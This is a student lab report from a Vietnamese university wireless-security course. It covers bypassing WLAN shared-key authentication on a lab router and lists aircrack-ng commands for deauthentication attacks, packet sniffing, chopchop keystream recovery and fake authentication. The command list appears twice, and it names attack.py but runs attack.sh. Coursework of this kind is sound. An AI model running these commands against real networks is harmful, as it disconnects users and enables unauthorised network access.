BÁO CÁO BÀI TẬP
- Môn học: An toàn Mạng không dây và di động
- Kỳ báo cáo: Buổi 03 (Session 03)
- Tên chủ đề: VƯỢT QUA XÁC THỰC MẠNG WLAN
- Bypassing WLAN Authentication
- GV: Lê Đức Thịnh
- Ngày báo cáo: 24/4/2023
- Nhóm: 802.11
- Lớp: NT330.N21.ANTT.1
- 20521047 20521047@gm.uit.edu.vn
- 20520514 20520514@gm.uit.edu.vn
Tested on TL-WR841N & ParrotOS because my Kali Linux do not support monitor mode on TL-WN725N USB Wifi, so I use Parrot, and wlan0 is replaced by wlx9ca2f4fd78ac
- All commands that I used
- To see wireless interface, use
iwconfig
- To start monitor mode, use
airmon-ng start wlan0
- You can use option -c to send deauth attack to specific users.
aireplay-ng -0 5 -a <AP's MAC> -c <IP's Client> wlan0mon
- To see all access points, use.
airodump-ng wlan0mon
- To sniff packets between Client and access point, use.
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
- If you do not have the .xor file, create it by using chopchop attack.
aireplay-ng -h <Your device which you use to connect> -a <mac AP> wlan0mon
- To fake SKA, use
aireplay-ng -1 0 -e "Nhom 802.11" -y <keystream.xor> -a <MAC AP> -h AA:AA:AA:AA:AA:AA wlan0mon
- Run attack.py, then you must open another terminal and run
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
./attack.sh <number you want> <mac AP> <wireless adapter>
- To see wireless interface, use
iwconfig
- To start monitor mode, use
airmon-ng start wlan0
- You can use option -c to send deauth attack to specific users.
aireplay-ng -0 5 -a <AP's MAC> -c <IP's Client> wlan0mon
- To see all access points, use.
airodump-ng wlan0mon
- To sniff packets between Client and access point, use.
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
- If you do not have the .xor file, create it by using chopchop attack.
aireplay-ng -h <Your device which you use to connect> -a <mac AP> wlan0mon
- To fake SKA, use
aireplay-ng -1 0 -e "Nhom 802.11" -y <keystream.xor> -a <MAC AP> -h AA:AA:AA:AA:AA:AA wlan0mon
- Run attack.py, then you must open another terminal and run
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
./attack.sh <number you want> <mac AP> <wireless adapter>